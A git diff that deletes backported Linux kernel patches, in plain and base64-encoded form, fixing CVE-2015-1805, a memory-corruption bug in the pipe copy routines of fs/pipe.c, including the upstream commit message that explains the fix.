- 				kunmap_atomic(src);
- 			else
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch.base64
deleted file mode 100644
index 42ecdafc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2ZzL3BpcGUuYyBiL2ZzL3BpcGUuYwppbmRleCBkMmM0NWUxLi5kODY2YzZmIDEwMDY0NAotLS0gYS9mcy9waXBlLmMKKysrIGIvZnMvcGlwZS5jCkBAIC0xMTcsMjUgKzExNywyNyBAQAogfQogCiBzdGF0aWMgaW50Ci1waXBlX2lvdl9jb3B5X2Zyb21fdXNlcih2b2lkICp0bywgc3RydWN0IGlvdmVjICppb3YsIHVuc2lnbmVkIGxvbmcgbGVuLAotCQkJaW50IGF0b21pYykKK3BpcGVfaW92X2NvcHlfZnJvbV91c2VyKHZvaWQgKmFkZHIsIGludCAqb2Zmc2V0LCBzdHJ1Y3QgaW92ZWMgKmlvdiwKKwkJCXNpemVfdCAqcmVtYWluaW5nLCBpbnQgYXRvbWljKQogewogCXVuc2lnbmVkIGxvbmcgY29weTsKIAotCXdoaWxlIChsZW4gPiAwKSB7CisJd2hpbGUgKCpyZW1haW5pbmcgPiAwKSB7CiAJCXdoaWxlICghaW92LT5pb3ZfbGVuKQogCQkJaW92Kys7Ci0JCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCBsZW4sIGlvdi0+aW92X2xlbik7CisJCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCAqcmVtYWluaW5nLCBpb3YtPmlvdl9sZW4pOwogCiAJCWlmIChhdG9taWMpIHsKLQkJCWlmIChfX2NvcHlfZnJvbV91c2VyX2luYXRvbWljKHRvLCBpb3YtPmlvdl9iYXNlLCBjb3B5KSkKKwkJCWlmIChfX2NvcHlfZnJvbV91c2VyX2luYXRvbWljKGFkZHIgKyAqb2Zmc2V0LAorCQkJCQkJICAgICAgaW92LT5pb3ZfYmFzZSwgY29weSkpCiAJCQkJcmV0dXJuIC1FRkFVTFQ7CiAJCX0gZWxzZSB7Ci0JCQlpZiAoY29weV9mcm9tX3VzZXIodG8sIGlvdi0+aW92X2Jhc2UsIGNvcHkpKQorCQkJaWYgKGNvcHlfZnJvbV91c2VyKGFkZHIgKyAqb2Zmc2V0LAorCQkJCQkgICBpb3YtPmlvdl9iYXNlLCBjb3B5KSkKIAkJCQlyZXR1cm4gLUVGQVVMVDsKIAkJfQotCQl0byArPSBjb3B5OwotCQlsZW4gLT0gY29weTsKKwkJKm9mZnNldCArPSBjb3B5OworCQkqcmVtYWluaW5nIC09IGNvcHk7CiAJCWlvdi0+aW92X2Jhc2UgKz0gY29weTsKIAkJaW92LT5pb3ZfbGVuIC09IGNvcHk7CiAJfQpAQCAtMTQzLDI1ICsxNDUsMjcgQEAKIH0KIAogc3RhdGljIGludAotcGlwZV9pb3ZfY29weV90b191c2VyKHN0cnVjdCBpb3ZlYyAqaW92LCBjb25zdCB2b2lkICpmcm9tLCB1bnNpZ25lZCBsb25nIGxlbiwKLQkJICAgICAgaW50IGF0b21pYykKK3BpcGVfaW92X2NvcHlfdG9fdXNlcihzdHJ1Y3QgaW92ZWMgKmlvdiwgdm9pZCAqYWRkciwgaW50ICpvZmZzZXQsCisJCSAgICAgIHNpemVfdCAqcmVtYWluaW5nLCBpbnQgYXRvbWljKQogewogCXVuc2lnbmVkIGxvbmcgY29weTsKIAotCXdoaWxlIChsZW4gPiAwKSB7CisJd2hpbGUgKCpyZW1haW5pbmcgPiAwKSB7CiAJCXdoaWxlICghaW92LT5pb3ZfbGVuKQogCQkJaW92Kys7Ci0JCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCBsZW4sIGlvdi0+aW92X2xlbik7CisJCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCAqcmVtYWluaW5nLCBpb3YtPmlvdl9sZW4pOwogCiAJCWlmIChhdG9taWMpIHsKLQkJCWlmIChfX2NvcHlfdG9fdXNlcl9pbmF0b21pYyhpb3YtPmlvdl9iYXNlLCBmcm9tLCBjb3B5KSkKKwkJCWlmIChfX2NvcHlfdG9fdXNlcl9pbmF0b21pYyhpb3YtPmlvdl9iYXNlLAorCQkJCQkJICAgIGFkZHIgKyAqb2Zmc2V0LCBjb3B5KSkKIAkJCQlyZXR1cm4gLUVGQVVMVDsKIAkJfSBlbHNlIHsKLQkJCWlmIChjb3B5X3RvX3VzZXIoaW92LT5pb3ZfYmFzZSwgZnJvbSwgY29weSkpCisJCQlpZiAoY29weV90b191c2VyKGlvdi0+aW92X2Jhc2UsCisJCQkJCSBhZGRyICsgKm9mZnNldCwgY29weSkpCiAJCQkJcmV0dXJuIC1FRkFVTFQ7CiAJCX0KLQkJZnJvbSArPSBjb3B5OwotCQlsZW4gLT0gY29weTsKKwkJKm9mZnNldCArPSBjb3B5OworCQkqcmVtYWluaW5nIC09IGNvcHk7CiAJCWlvdi0+aW92X2Jhc2UgKz0gY29weTsKIAkJaW92LT5pb3ZfbGVuIC09IGNvcHk7CiAJfQpAQCAtMzk1LDcgKzM5OSw3IEBACiAJCQlzdHJ1Y3QgcGlwZV9idWZmZXIgKmJ1ZiA9IHBpcGUtPmJ1ZnMgKyBjdXJidWY7CiAJCQljb25zdCBzdHJ1Y3QgcGlwZV9idWZfb3BlcmF0aW9ucyAqb3BzID0gYnVmLT5vcHM7CiAJCQl2b2lkICphZGRyOwotCQkJc2l6ZV90IGNoYXJzID0gYnVmLT5sZW47CisJCQlzaXplX3QgY2hhcnMgPSBidWYtPmxlbiwgcmVtYWluaW5nOwogCQkJaW50IGVycm9yLCBhdG9taWM7CiAKIAkJCWlmIChjaGFycyA+IHRvdGFsX2xlbikKQEAgLTQwOSw5ICs0MTMsMTEgQEAKIAkJCX0KIAogCQkJYXRvbWljID0gIWlvdl9mYXVsdF9pbl9wYWdlc193cml0ZShpb3YsIGNoYXJzKTsKKwkJCXJlbWFpbmluZyA9IGNoYXJzOwogcmVkbzoKIAkJCWFkZHIgPSBvcHMtPm1hcChwaXBlLCBidWYsIGF0b21pYyk7Ci0JCQllcnJvciA9IHBpcGVfaW92X2NvcHlfdG9fdXNlcihpb3YsIGFkZHIgKyBidWYtPm9mZnNldCwgY2hhcnMsIGF0b21pYyk7CisJCQllcnJvciA9IHBpcGVfaW92X2NvcHlfdG9fdXNlcihpb3YsIGFkZHIsICZidWYtPm9mZnNldCwKKwkJCQkJCSAgICAgICZyZW1haW5pbmcsIGF0b21pYyk7CiAJCQlvcHMtPnVubWFwKHBpcGUsIGJ1ZiwgYWRkcik7CiAJCQlpZiAodW5saWtlbHkoZXJyb3IpKSB7CiAJCQkJLyoKQEAgLTQyNiw3ICs0MzIsNiBAQAogCQkJCWJyZWFrOwogCQkJfQogCQkJcmV0ICs9IGNoYXJzOwotCQkJYnVmLT5vZmZzZXQgKz0gY2hhcnM7CiAJCQlidWYtPmxlbiAtPSBjaGFyczsKIAogCQkJLyogV2FzIGl0IGEgcGFja2V0IGJ1ZmZlcj8gQ2xlYW4gdXAgYW5kIGV4aXQgKi8KQEAgLTUzMSw2ICs1MzYsNyBAQAogCQlpZiAob3BzLT5jYW5fbWVyZ2UgJiYgb2Zmc2V0ICsgY2hhcnMgPD0gUEFHRV9TSVpFKSB7CiAJCQlpbnQgZXJyb3IsIGF0b21pYyA9IDE7CiAJCQl2b2lkICphZGRyOworCQkJc2l6ZV90IHJlbWFpbmluZyA9IGNoYXJzOwogCiAJCQllcnJvciA9IG9wcy0+Y29uZmlybShwaXBlLCBidWYpOwogCQkJaWYgKGVycm9yKQpAQCAtNTM5LDggKzU0NSw4IEBACiAJCQlpb3ZfZmF1bHRfaW5fcGFnZXNfcmVhZChpb3YsIGNoYXJzKTsKIHJlZG8xOgogCQkJYWRkciA9IG9wcy0+bWFwKHBpcGUsIGJ1ZiwgYXRvbWljKTsKLQkJCWVycm9yID0gcGlwZV9pb3ZfY29weV9mcm9tX3VzZXIob2Zmc2V0ICsgYWRkciwgaW92LAotCQkJCQkJCWNoYXJzLCBhdG9taWMpOworCQkJZXJyb3IgPSBwaXBlX2lvdl9jb3B5X2Zyb21fdXNlcihhZGRyLCAmb2Zmc2V0LCBpb3YsCisJCQkJCQkJJnJlbWFpbmluZywgYXRvbWljKTsKIAkJCW9wcy0+dW5tYXAocGlwZSwgYnVmLCBhZGRyKTsKIAkJCXJldCA9IGVycm9yOwogCQkJZG9fd2FrZXVwID0gMTsKQEAgLTU3NSw2ICs1ODEsOCBAQAogCQkJc3RydWN0IHBhZ2UgKnBhZ2UgPSBwaXBlLT50bXBfcGFnZTsKIAkJCWNoYXIgKnNyYzsKIAkJCWludCBlcnJvciwgYXRvbWljID0gMTsKKwkJCWludCBvZmZzZXQgPSAwOworCQkJc2l6ZV90IHJlbWFpbmluZzsKIAogCQkJaWYgKCFwYWdlKSB7CiAJCQkJcGFnZSA9IGFsbG9jX3BhZ2UoR0ZQX0hJR0hVU0VSKTsKQEAgLTU5NSwxNCArNjAzLDE1IEBACiAJCQkJY2hhcnMgPSB0b3RhbF9sZW47CiAKIAkJCWlvdl9mYXVsdF9pbl9wYWdlc19yZWFkKGlvdiwgY2hhcnMpOworCQkJcmVtYWluaW5nID0gY2hhcnM7CiByZWRvMjoKIAkJCWlmIChhdG9taWMpCiAJCQkJc3JjID0ga21hcF9hdG9taWMocGFnZSk7CiAJCQllbHNlCiAJCQkJc3JjID0ga21hcChwYWdlKTsKIAotCQkJZXJyb3IgPSBwaXBlX2lvdl9jb3B5X2Zyb21fdXNlcihzcmMsIGlvdiwgY2hhcnMsCi0JCQkJCQkJYXRvbWljKTsKKwkJCWVycm9yID0gcGlwZV9pb3ZfY29weV9mcm9tX3VzZXIoc3JjLCAmb2Zmc2V0LCBpb3YsCisJCQkJCQkJJnJlbWFpbmluZywgYXRvbWljKTsKIAkJCWlmIChhdG9taWMpCiAJCQkJa3VubWFwX2F0b21pYyhzcmMpOwogCQkJZWxzZQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch
deleted file mode 100644
index 0f9c18b8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 78fd0d0..46f1ab2 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -117,25 +117,27 @@
- }
- 
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
--			int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+			size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+			if (__copy_from_user_inatomic(addr + *offset,
-+						      iov->iov_base, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_from_user(to, iov->iov_base, copy))
-+			if (copy_from_user(addr + *offset,
-+					   iov->iov_base, copy))
- 				return -EFAULT;
- 		}
--		to += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -143,25 +145,27 @@
- }
- 
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
--		      int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+		      size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+			if (__copy_to_user_inatomic(iov->iov_base,
-+						    addr + *offset, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_to_user(iov->iov_base, from, copy))
-+			if (copy_to_user(iov->iov_base,
-+					 addr + *offset, copy))
- 				return -EFAULT;
- 		}
--		from += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -395,7 +399,7 @@
- 			struct pipe_buffer *buf = pipe->bufs + curbuf;
- 			const struct pipe_buf_operations *ops = buf->ops;
- 			void *addr;
--			size_t chars = buf->len;
-+			size_t chars = buf->len, remaining;
- 			int error, atomic;
- 
- 			if (chars > total_len)
-@@ -409,9 +413,11 @@
- 			}
- 
- 			atomic = !iov_fault_in_pages_write(iov, chars);
-+			remaining = chars;
- redo:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+			error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+						      &remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			if (unlikely(error)) {
- 				/*
-@@ -426,7 +432,6 @@
- 				break;
- 			}
- 			ret += chars;
--			buf->offset += chars;
- 			buf->len -= chars;
- 
- 			/* Was it a packet buffer? Clean up and exit */
-@@ -531,6 +536,7 @@
- 		if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- 			int error, atomic = 1;
- 			void *addr;
-+			size_t remaining = chars;
- 
- 			error = ops->confirm(pipe, buf);
- 			if (error)
-@@ -539,8 +545,8 @@
- 			iov_fault_in_pages_read(iov, chars);
- redo1:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_from_user(offset + addr, iov,
--							chars, atomic);
-+			error = pipe_iov_copy_from_user(addr, &offset, iov,
-+							&remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			ret = error;
- 			do_wakeup = 1;
-@@ -575,6 +581,8 @@
- 			struct page *page = pipe->tmp_page;
- 			char *src;
- 			int error, atomic = 1;
-+			int offset = 0;
-+			size_t remaining;
- 
- 			if (!page) {
- 				page = alloc_page(GFP_HIGHUSER);
-@@ -595,14 +603,15 @@
- 				chars = total_len;
- 
- 			iov_fault_in_pages_read(iov, chars);
-+			remaining = chars;
- redo2:
- 			if (atomic)
- 				src = kmap_atomic(page);
- 			else
- 				src = kmap(page);
- 
--			error = pipe_iov_copy_from_user(src, iov, chars,
--							atomic);
-+			error = pipe_iov_copy_from_user(src, &offset, iov,
-+							&remaining, atomic);
- 			if (atomic)
- 				kunmap_atomic(src);
- 			else
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch.base64
deleted file mode 100644
index 870cdeab..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2ZzL3BpcGUuYyBiL2ZzL3BpcGUuYwppbmRleCA3OGZkMGQwLi40NmYxYWIyIDEwMDY0NAotLS0gYS9mcy9waXBlLmMKKysrIGIvZnMvcGlwZS5jCkBAIC0xMTcsMjUgKzExNywyNyBAQAogfQogCiBzdGF0aWMgaW50Ci1waXBlX2lvdl9jb3B5X2Zyb21fdXNlcih2b2lkICp0bywgc3RydWN0IGlvdmVjICppb3YsIHVuc2lnbmVkIGxvbmcgbGVuLAotCQkJaW50IGF0b21pYykKK3BpcGVfaW92X2NvcHlfZnJvbV91c2VyKHZvaWQgKmFkZHIsIGludCAqb2Zmc2V0LCBzdHJ1Y3QgaW92ZWMgKmlvdiwKKwkJCXNpemVfdCAqcmVtYWluaW5nLCBpbnQgYXRvbWljKQogewogCXVuc2lnbmVkIGxvbmcgY29weTsKIAotCXdoaWxlIChsZW4gPiAwKSB7CisJd2hpbGUgKCpyZW1haW5pbmcgPiAwKSB7CiAJCXdoaWxlICghaW92LT5pb3ZfbGVuKQogCQkJaW92Kys7Ci0JCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCBsZW4sIGlvdi0+aW92X2xlbik7CisJCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCAqcmVtYWluaW5nLCBpb3YtPmlvdl9sZW4pOwogCiAJCWlmIChhdG9taWMpIHsKLQkJCWlmIChfX2NvcHlfZnJvbV91c2VyX2luYXRvbWljKHRvLCBpb3YtPmlvdl9iYXNlLCBjb3B5KSkKKwkJCWlmIChfX2NvcHlfZnJvbV91c2VyX2luYXRvbWljKGFkZHIgKyAqb2Zmc2V0LAorCQkJCQkJICAgICAgaW92LT5pb3ZfYmFzZSwgY29weSkpCiAJCQkJcmV0dXJuIC1FRkFVTFQ7CiAJCX0gZWxzZSB7Ci0JCQlpZiAoY29weV9mcm9tX3VzZXIodG8sIGlvdi0+aW92X2Jhc2UsIGNvcHkpKQorCQkJaWYgKGNvcHlfZnJvbV91c2VyKGFkZHIgKyAqb2Zmc2V0LAorCQkJCQkgICBpb3YtPmlvdl9iYXNlLCBjb3B5KSkKIAkJCQlyZXR1cm4gLUVGQVVMVDsKIAkJfQotCQl0byArPSBjb3B5OwotCQlsZW4gLT0gY29weTsKKwkJKm9mZnNldCArPSBjb3B5OworCQkqcmVtYWluaW5nIC09IGNvcHk7CiAJCWlvdi0+aW92X2Jhc2UgKz0gY29weTsKIAkJaW92LT5pb3ZfbGVuIC09IGNvcHk7CiAJfQpAQCAtMTQzLDI1ICsxNDUsMjcgQEAKIH0KIAogc3RhdGljIGludAotcGlwZV9pb3ZfY29weV90b191c2VyKHN0cnVjdCBpb3ZlYyAqaW92LCBjb25zdCB2b2lkICpmcm9tLCB1bnNpZ25lZCBsb25nIGxlbiwKLQkJICAgICAgaW50IGF0b21pYykKK3BpcGVfaW92X2NvcHlfdG9fdXNlcihzdHJ1Y3QgaW92ZWMgKmlvdiwgdm9pZCAqYWRkciwgaW50ICpvZmZzZXQsCisJCSAgICAgIHNpemVfdCAqcmVtYWluaW5nLCBpbnQgYXRvbWljKQogewogCXVuc2lnbmVkIGxvbmcgY29weTsKIAotCXdoaWxlIChsZW4gPiAwKSB7CisJd2hpbGUgKCpyZW1haW5pbmcgPiAwKSB7CiAJCXdoaWxlICghaW92LT5pb3ZfbGVuKQogCQkJaW92Kys7Ci0JCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCBsZW4sIGlvdi0+aW92X2xlbik7CisJCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCAqcmVtYWluaW5nLCBpb3YtPmlvdl9sZW4pOwogCiAJCWlmIChhdG9taWMpIHsKLQkJCWlmIChfX2NvcHlfdG9fdXNlcl9pbmF0b21pYyhpb3YtPmlvdl9iYXNlLCBmcm9tLCBjb3B5KSkKKwkJCWlmIChfX2NvcHlfdG9fdXNlcl9pbmF0b21pYyhpb3YtPmlvdl9iYXNlLAorCQkJCQkJICAgIGFkZHIgKyAqb2Zmc2V0LCBjb3B5KSkKIAkJCQlyZXR1cm4gLUVGQVVMVDsKIAkJfSBlbHNlIHsKLQkJCWlmIChjb3B5X3RvX3VzZXIoaW92LT5pb3ZfYmFzZSwgZnJvbSwgY29weSkpCisJCQlpZiAoY29weV90b191c2VyKGlvdi0+aW92X2Jhc2UsCisJCQkJCSBhZGRyICsgKm9mZnNldCwgY29weSkpCiAJCQkJcmV0dXJuIC1FRkFVTFQ7CiAJCX0KLQkJZnJvbSArPSBjb3B5OwotCQlsZW4gLT0gY29weTsKKwkJKm9mZnNldCArPSBjb3B5OworCQkqcmVtYWluaW5nIC09IGNvcHk7CiAJCWlvdi0+aW92X2Jhc2UgKz0gY29weTsKIAkJaW92LT5pb3ZfbGVuIC09IGNvcHk7CiAJfQpAQCAtMzk1LDcgKzM5OSw3IEBACiAJCQlzdHJ1Y3QgcGlwZV9idWZmZXIgKmJ1ZiA9IHBpcGUtPmJ1ZnMgKyBjdXJidWY7CiAJCQljb25zdCBzdHJ1Y3QgcGlwZV9idWZfb3BlcmF0aW9ucyAqb3BzID0gYnVmLT5vcHM7CiAJCQl2b2lkICphZGRyOwotCQkJc2l6ZV90IGNoYXJzID0gYnVmLT5sZW47CisJCQlzaXplX3QgY2hhcnMgPSBidWYtPmxlbiwgcmVtYWluaW5nOwogCQkJaW50IGVycm9yLCBhdG9taWM7CiAKIAkJCWlmIChjaGFycyA+IHRvdGFsX2xlbikKQEAgLTQwOSw5ICs0MTMsMTEgQEAKIAkJCX0KIAogCQkJYXRvbWljID0gIWlvdl9mYXVsdF9pbl9wYWdlc193cml0ZShpb3YsIGNoYXJzKTsKKwkJCXJlbWFpbmluZyA9IGNoYXJzOwogcmVkbzoKIAkJCWFkZHIgPSBvcHMtPm1hcChwaXBlLCBidWYsIGF0b21pYyk7Ci0JCQllcnJvciA9IHBpcGVfaW92X2NvcHlfdG9fdXNlcihpb3YsIGFkZHIgKyBidWYtPm9mZnNldCwgY2hhcnMsIGF0b21pYyk7CisJCQllcnJvciA9IHBpcGVfaW92X2NvcHlfdG9fdXNlcihpb3YsIGFkZHIsICZidWYtPm9mZnNldCwKKwkJCQkJCSAgICAgICZyZW1haW5pbmcsIGF0b21pYyk7CiAJCQlvcHMtPnVubWFwKHBpcGUsIGJ1ZiwgYWRkcik7CiAJCQlpZiAodW5saWtlbHkoZXJyb3IpKSB7CiAJCQkJLyoKQEAgLTQyNiw3ICs0MzIsNiBAQAogCQkJCWJyZWFrOwogCQkJfQogCQkJcmV0ICs9IGNoYXJzOwotCQkJYnVmLT5vZmZzZXQgKz0gY2hhcnM7CiAJCQlidWYtPmxlbiAtPSBjaGFyczsKIAogCQkJLyogV2FzIGl0IGEgcGFja2V0IGJ1ZmZlcj8gQ2xlYW4gdXAgYW5kIGV4aXQgKi8KQEAgLTUzMSw2ICs1MzYsNyBAQAogCQlpZiAob3BzLT5jYW5fbWVyZ2UgJiYgb2Zmc2V0ICsgY2hhcnMgPD0gUEFHRV9TSVpFKSB7CiAJCQlpbnQgZXJyb3IsIGF0b21pYyA9IDE7CiAJCQl2b2lkICphZGRyOworCQkJc2l6ZV90IHJlbWFpbmluZyA9IGNoYXJzOwogCiAJCQllcnJvciA9IG9wcy0+Y29uZmlybShwaXBlLCBidWYpOwogCQkJaWYgKGVycm9yKQpAQCAtNTM5LDggKzU0NSw4IEBACiAJCQlpb3ZfZmF1bHRfaW5fcGFnZXNfcmVhZChpb3YsIGNoYXJzKTsKIHJlZG8xOgogCQkJYWRkciA9IG9wcy0+bWFwKHBpcGUsIGJ1ZiwgYXRvbWljKTsKLQkJCWVycm9yID0gcGlwZV9pb3ZfY29weV9mcm9tX3VzZXIob2Zmc2V0ICsgYWRkciwgaW92LAotCQkJCQkJCWNoYXJzLCBhdG9taWMpOworCQkJZXJyb3IgPSBwaXBlX2lvdl9jb3B5X2Zyb21fdXNlcihhZGRyLCAmb2Zmc2V0LCBpb3YsCisJCQkJCQkJJnJlbWFpbmluZywgYXRvbWljKTsKIAkJCW9wcy0+dW5tYXAocGlwZSwgYnVmLCBhZGRyKTsKIAkJCXJldCA9IGVycm9yOwogCQkJZG9fd2FrZXVwID0gMTsKQEAgLTU3NSw2ICs1ODEsOCBAQAogCQkJc3RydWN0IHBhZ2UgKnBhZ2UgPSBwaXBlLT50bXBfcGFnZTsKIAkJCWNoYXIgKnNyYzsKIAkJCWludCBlcnJvciwgYXRvbWljID0gMTsKKwkJCWludCBvZmZzZXQgPSAwOworCQkJc2l6ZV90IHJlbWFpbmluZzsKIAogCQkJaWYgKCFwYWdlKSB7CiAJCQkJcGFnZSA9IGFsbG9jX3BhZ2UoR0ZQX0hJR0hVU0VSKTsKQEAgLTU5NSwxNCArNjAzLDE1IEBACiAJCQkJY2hhcnMgPSB0b3RhbF9sZW47CiAKIAkJCWlvdl9mYXVsdF9pbl9wYWdlc19yZWFkKGlvdiwgY2hhcnMpOworCQkJcmVtYWluaW5nID0gY2hhcnM7CiByZWRvMjoKIAkJCWlmIChhdG9taWMpCiAJCQkJc3JjID0ga21hcF9hdG9taWMocGFnZSk7CiAJCQllbHNlCiAJCQkJc3JjID0ga21hcChwYWdlKTsKIAotCQkJZXJyb3IgPSBwaXBlX2lvdl9jb3B5X2Zyb21fdXNlcihzcmMsIGlvdiwgY2hhcnMsCi0JCQkJCQkJYXRvbWljKTsKKwkJCWVycm9yID0gcGlwZV9pb3ZfY29weV9mcm9tX3VzZXIoc3JjLCAmb2Zmc2V0LCBpb3YsCisJCQkJCQkJJnJlbWFpbmluZywgYXRvbWljKTsKIAkJCWlmIChhdG9taWMpCiAJCQkJa3VubWFwX2F0b21pYyhzcmMpOwogCQkJZWxzZQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.16/0004.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.16/0004.patch
deleted file mode 100644
index c4f86752..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.16/0004.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From a39bf4a8e29c7336c0c72652b7d0dd1cd1b13c51 Mon Sep 17 00:00:00 2001
-From: Ben Hutchings <ben@decadent.org.uk>
-Date: Mon, 15 Jun 2015 03:51:55 +0100
-Subject: pipe: iovec: Fix memory corruption when retrying atomic copy as
- non-atomic
-
-pipe_iov_copy_{from,to}_user() may be tried twice with the same iovec,
-the first time atomically and the second time not.  The second attempt
-needs to continue from the iovec position, pipe buffer offset and
-remaining length where the first attempt failed, but currently the
-pipe buffer offset and remaining length are reset.  This will corrupt
-the piped data (possibly also leading to an information leak between
-processes) and may also corrupt kernel memory.
-
-This was fixed upstream by commits f0d1bec9d58d ("new helper:
-copy_page_from_iter()") and 637b58c2887e ("switch pipe_read() to
-copy_page_to_iter()"), but those aren't suitable for stable.  This fix
-for older kernel versions was made by Seth Jennings for RHEL and I
-have extracted it from their update.
-
-CVE-2015-1805
-
-References: https://bugzilla.redhat.com/show_bug.cgi?id=1202855
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
-[lizf: Backported to 3.4: adjust context]
-Signed-off-by: Zefan Li <lizefan@huawei.com>
----
- fs/pipe.c | 55 ++++++++++++++++++++++++++++++++-----------------------
- 1 file changed, 32 insertions(+), 23 deletions(-)
-
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 1667e6f..abfb935 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -104,25 +104,27 @@ void pipe_wait(struct pipe_inode_info *pipe)
- }
- 
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
--			int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+			size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+			if (__copy_from_user_inatomic(addr + *offset,
-+						      iov->iov_base, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_from_user(to, iov->iov_base, copy))
-+			if (copy_from_user(addr + *offset,
-+					   iov->iov_base, copy))
- 				return -EFAULT;
- 		}
--		to += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -130,25 +132,27 @@ pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
- }
- 
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
--		      int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+		      size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+			if (__copy_to_user_inatomic(iov->iov_base,
-+						    addr + *offset, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_to_user(iov->iov_base, from, copy))
-+			if (copy_to_user(iov->iov_base,
-+					 addr + *offset, copy))
- 				return -EFAULT;
- 		}
--		from += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -384,7 +388,7 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 			struct pipe_buffer *buf = pipe->bufs + curbuf;
- 			const struct pipe_buf_operations *ops = buf->ops;
- 			void *addr;
--			size_t chars = buf->len;
-+			size_t chars = buf->len, remaining;
- 			int error, atomic;
- 
- 			if (chars > total_len)
-@@ -398,9 +402,11 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 			}
- 
- 			atomic = !iov_fault_in_pages_write(iov, chars);
-+			remaining = chars;
- redo:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+			error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+						      &remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			if (unlikely(error)) {
- 				/*
-@@ -415,7 +421,6 @@ redo:
- 				break;
- 			}
- 			ret += chars;
